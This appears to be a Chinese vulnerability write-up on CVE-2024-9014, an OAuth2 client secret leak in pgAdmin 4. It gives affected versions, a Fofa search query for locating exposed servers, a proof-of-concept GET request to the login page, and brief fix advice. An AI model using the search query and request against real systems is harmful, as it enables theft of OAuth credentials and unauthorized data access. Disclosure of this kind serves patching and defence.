首页 > 其他分享 >pgadmin4敏感信息泄露 CVE-2024-9014

pgadmin4敏感信息泄露 CVE-2024-9014

时间:2024-10-09 14:51:43浏览次数:9  
标签:9014 27 601.1 pgAdmin 2024 漏洞 版本 pgadmin4 Postgres

0x01 产品描述:

        pgAdmin是全球最先进的开源数据库Postgres的领先开源管理工具。 pgAdmin 4旨在满足新手和经验丰富的Postgres用户的需求,提供了强大的图形界面,可简化数据库对象的创建,维护和使用。其可以在Linux,Unix,macOS和Windows上使用,以管理PostgreSQL和EDB Advanced Server 9.5及更高版本

0x02 漏洞描述:

        pgAdmin 8.11 及更早版本存在 OAuth2 身份验证安全漏洞。此漏洞允许攻击者获取客户端 ID 和密钥,从而导致未经授权访问用户数据

0x03 影响版本:

pgAdmin4  8.9-3.fc40

pgAdmin4  8.12-1.fc41

0x04 搜索语句:

Fofa:icon_hash="1502815117"

0x05 漏洞复现:

GET /login?next=/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27
Connection: close
Accept-Encoding: gzip

0x06 修复建议:

官网已在最新版本修复该问题,请即时修复

Download

标签:9014,27,601.1,pgAdmin,2024,漏洞,版本,pgadmin4,Postgres
From: https://blog.csdn.net/xc_214/article/details/142781057

相关文章

  • (2024最新毕设合集)基于SpringBoot的乡村书屋小程序-31881|可做计算机毕业设计JAVA、PHP
    摘要随着信息技术的快速发展和互联网的广泛普及,数字化服务的需求不断增长,乡村书屋作为传统的文化服务机构也需要适应这一变革。本研究将使用Java开发技术,通过springboot作为框架,结合微信小程序,和MySQL作为数据存储的技术,开发一套功能齐备可移动的乡村书屋小程序,旨在提升乡......
  • 20222407 2024-2025-1《网络与系统攻防技术》实验一实验报告
    1.实验内容1.1本周学习内容1.1.1缓冲区溢出的定义和原因定义:写入缓冲区的数据量超过该缓冲区能容纳的最大限度,造成溢出的数据改写了与该缓冲区相邻的原始数据的情形。原因:(直接)由于代码语言的设计问题、程序员的安全意识问题,程序没有严格的内存越界检查;(根本)冯诺依曼体系的安全......
  • 20222314 2024-2025-1 《网络与系统攻防技术》实验一实验报告
    网络攻防实验报告姓名:陈振烨学号:20222314实验日期:2024/09/29—2024/10/09实验名称:缓冲区溢出和shellcode指导教师:王志强实验要求: 1.掌握NOP,JNE,JE,JMP,CMP汇编指令的......
  • 2024年软件设计师中级(软考中级)详细笔记【3】数据结构(下)(分值5分)
    上午题第3章数据结构下部目录前言第3章数据结构【下】(5分)3.5查找3.5.1查找的基本概念【考点】3.5.2静态查找表的查找方法3.5.3动态查找表3.5.4哈希表3.5.4.1哈希表的定义3.5.4.2哈希函数的构造方法3.5.4.3处理冲突的方法3.6排序3.6.1排序的基本概念3.6.2......
  • 20241009--Java--MyBatis-Plus快速上手(1)
     一、MyBatis-Plus是什么?MyBatis是一个流行的开源持久层框架,用于简化数据库交互。它提供了一个简单的方法来执行数据库操作,同时保留了SQL的灵活性。MyBatis曾经被称为iBatis,是一个半自动化的ORM(Object-RelationalMapping对象关系映射)框架,它允许开发者将Java对象映......
  • PatriotCTF2024 Web Impersonate
    源码:#!/usr/bin/envpython3fromflaskimportFlask,request,render_template,jsonify,abort,redirect,sessionimportuuidimportosfromdatetimeimportdatetime,timedeltaimporthashlibapp=Flask(__name__)server_start_time=datetime.now()server_s......
  • 【2024-10-08】母亲坏事
    20:00袅袅凉风动,凄凄寒露零。兰衰花始白,荷破叶犹青。独立栖沙鹤,双飞照水萤。若为寥落境,仍值酒初醒。                                                 ——《池上》唐......
  • 【2024-10-10】好心坏事
    20:00事到手,且莫急,便要缓缓想;想得时,且莫缓,便要急急行。                                                 ——清·金缨《格言联璧》昨晚下班回家在附近跑完步,让母亲给......
  • 【2024-10-05】连岳摘抄
    23:59不是因为你不好而有自卑感。无论看起来多么优秀的人,多少都会感到自卑。只要还有目标,当然就有自卑感。                                                 ——阿尔弗......
  • 2024初秋集训——提高组 #33
    C.星际航行题目描述给定一个\(N\)个点\(M\)条边的无向带权图。我们定义一条路径的长度为路径上边权最大值。有\(Q\)次查询,第\(i\)次查询从\(u\)到其他\(N-1\)个点的最短路径中路径长度第\(k\)大的长度。思路首先,此题显然只会在最小生成树上选择路径。所以我们......